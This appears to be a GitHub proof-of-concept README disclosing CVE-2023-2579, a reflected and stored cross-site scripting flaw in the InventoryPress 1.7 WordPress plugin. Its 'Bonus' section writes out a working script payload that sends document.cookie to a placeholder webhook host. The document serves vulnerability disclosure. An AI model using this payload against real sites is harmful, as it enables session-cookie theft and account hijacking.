daniloalbuqrque / poc-cve-xss-inventory-press-plugin

PoC for CVE-2023-2579

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Github PK Tool:Github PK Tool


Title: Authenticated Reflected Cross-Site Scripting in InventoryPress Plugin for WordPress CMS
Date: 2023-04-21
Author: Danilo Albuquerque
Vendor Homepage: https://wordpress.org
Software Link: https://wordpress.org/download
Version: WordPress 6.2
Plugin's Name and Version: InventoryPress 1.7
Tested on: Brave (Version 1.50.119 Chromium: 112.0.5615.121 (Official Version) 64 bits)

PoC for Reflected XSS vulnerability in InventoryPress 1.7

  1. Go to the page that you can add the items into the inventory;
  2. Add the malicious payload into the "Description" input of the form;
  3. Access the new item's link generated by the plugin;

When you do all that and update the current page, it will bring you the alert pop-up with the message in it.

Screenshots below

  1. Go to the page that you can add the items into the inventory:

  2. Add the malicious payload into the "Description" input of the form:

  3. Access the new item's link generated by the plugin:

  4. Once the request is done, the alert pop-up is showed:

Bonus - PoC for Stored XSS

  1. Add the following payload to steal the cookies into the "Description" input: <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>. Then post the new item, or update an old one;

  2. Trigger and get the credentials in the Webhook site

  3. Adding the payload and posting the item (or updating it): image

  4. Triggering and getting the credentials: image